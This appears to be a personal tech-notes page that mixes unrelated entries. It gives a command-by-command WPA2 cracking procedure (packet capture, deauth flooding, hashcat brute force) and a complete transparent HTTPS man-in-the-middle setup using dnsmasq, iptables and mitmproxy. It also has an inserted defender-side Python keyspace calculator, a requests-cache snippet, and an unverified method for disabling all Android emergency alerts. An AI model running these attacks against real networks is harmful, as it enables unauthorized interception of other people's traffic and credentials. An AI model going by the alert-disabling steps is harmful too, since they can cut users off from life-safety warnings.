Not where I have to go, but where I want to go
WPA2 Crack with hashcat
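With WPA2, the packets carrying the salt and KDF2 value exchanged during authentication can be captured and then attacked by brute force or with a dictionary.
Put the WLAN interface into monitor mode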
airmon-ng start wlp4s0
airmon-ng check kill
rfkill list
rfkill unblock [dev_id]
Scan APs
airodump-ng -c 5 wlp4s0mon [--band a (for 5 GHz)]
airodump-ng --bssid [bssid] -c 6 --write packet wlp4s0mon
Send Deauth Packet
aireplay-ng --deauth 100 -a [Station] wlp4s0mon
Convert cap to hccapx (outdated method)
cap2hccapx.bin packet-01.cap out.hccapx
Convert cap to hc22000
hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
Run hashcat
hashcat -m 2500 out.hccapx -a 3 ?d?d?d?d?d?d?d?d -w 3
hashcat -m 22000 hash.hc22000 wordlist.txt
Or use aircrack-ng
$ aircrack-ng dumpfile.pcapng -w wordlist.txt
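Why an 8-digit passphrase is weak against this kind of offline guessing, shown from the defender's side as an added example (not part of the original post): WPA2-PSK derives its key with PBKDF2-HMAC-SHA1 using the SSID as salt, so resistance rests entirely on passphrase entropy. The guess rate, the SSIDs and the passphrases below are assumed or constructed values.

```python
import hashlib

ITERATIONS = 4096          # fixed by the WPA2-PSK key derivation
PMK_LEN = 32               # 256-bit pairwise master key
ASSUMED_RATE = 500_000     # guesses per second; an assumed figure, not a measurement


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode(), ITERATIONS, PMK_LEN
    )


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidate passphrases for a fixed alphabet and length."""
    return alphabet_size ** length


def hours_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at the given guess rate."""
    return candidates / guesses_per_second / 3600


def compare_policies(rate: float = ASSUMED_RATE) -> dict:
    """Worst-case exhaustion time in hours for three passphrase policies."""
    policies = {
        "8 digits": keyspace(10, 8),
        "10 lowercase letters": keyspace(26, 10),
        "16 random alphanumerics": keyspace(62, 16),
    }
    return {name: hours_to_exhaust(n, rate) for name, n in policies.items()}


if __name__ == "__main__":
    # The SSID acts as the salt: the same passphrase yields a different PMK
    # per network name, so precomputed tables only apply to one SSID.
    for ssid in ("HomeAP-constructed", "OfficeAP-constructed"):
        print(ssid, derive_pmk("12345678", ssid).hex())
    for name, hours in compare_policies().items():
        print(f"{name:26s} {hours:.3e} hours at {ASSUMED_RATE} guesses/s")
```
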
Python requests with cache
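import requests
import requests_cache

# Cache responses in a local SQLite file named requests_cache.sqlite
requests_cache.install_cache('requests_cache')
start_url = 'https://example.com/'  # placeholder URL
res = requests.get(start_url)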
HTTPS MITM with transparent mode
Set the IP address for the client-facing adapter
Edit /etc/network/interfaces:
# Proxy Server network interface
auto eth1
iface eth1 inet static
address 192.168.3.1
netmask 255.255.255.0
gateway 0.0.0.0
Resolve the port 53 conflict
# vi /etc/systemd/resolved.conf    (set DNSStubListener=no)
# systemctl restart systemd-resolved
Configure dnsmasq
Then replace /etc/dnsmasq.conf with:
# Listen for DNS requests on the internal network
interface=eth1
# Act as a DHCP server, assign IP addresses to clients
dhcp-range=192.168.3.10,192.168.3.100,96h
# Broadcast gateway and dns server information
dhcp-option=option:router,192.168.3.1
dhcp-option=option:dns-server,192.168.3.1
# systemctl restart dnsmasq
Sysctls
sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv6.conf.all.forwarding=1
sysctl -w net.ipv4.conf.all.send_redirects=0
Rerouting
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 443 -j REDIRECT --to-port 8080
Start mitmproxy
$ mitmweb --mode transparent --showhost
https://docs.mitmproxy.org/stable/concepts-modes/#socks-proxy
https://docs.mitmproxy.org/stable/howto-transparent/
https://nickcharlton.net/posts/transparent-proxy-virtual-machines-mitmproxy.html
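How to block emergency alert messages on a Samsung Galaxy
Emergency alert messages are also known as Cell Broadcast Service and come in three levels: Wartime alert, Information notification, and Emergency alert. Of these, the Wartime alert cannot be controlled at the user level (cmas_presidential_level_alert in the code).
However, it can be blocked by disabling the related packages.
Listing the related packages shows the four below (on an SGS10 5G):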
$ pm list packages -f | grep cellbroadcast
package:/system/system_ext/overlay/CellBroadcastConfigOverlayPlatform_KR.apk=com.google.android.overlay.modules.cellbroadcastreceiver
package:/system/system_ext/priv-app/CellBroadcastAppPlatform/CellBroadcastAppPlatform.apk=com.android.cellbroadcastreceiver
package:/system/priv-app/CellBroadcastServiceModulePlatform/CellBroadcastServiceModulePlatform.apk=com.android.cellbroadcastservice
package:/system/system_ext/overlay/CellBroadcastServiceOverlay.apk=com.google.android.overlay.modules.cellbroadcastservice
Disable all of them with the commands below.
$ pm disable-user --user 0 com.google.android.overlay.modules.cellbroadcastreceiver
$ pm disable-user --user 0 com.android.cellbroadcastreceiver
$ pm disable-user --user 0 com.android.cellbroadcastservice
$ pm disable-user --user 0 com.google.android.overlay.modules.cellbroadcastservice
Checking afterwards,
you can see that the emergency alert items have disappeared.
※ This method has not actually been verified (I have not been able to receive an alert since…). Everyone is responsible for their own use of it.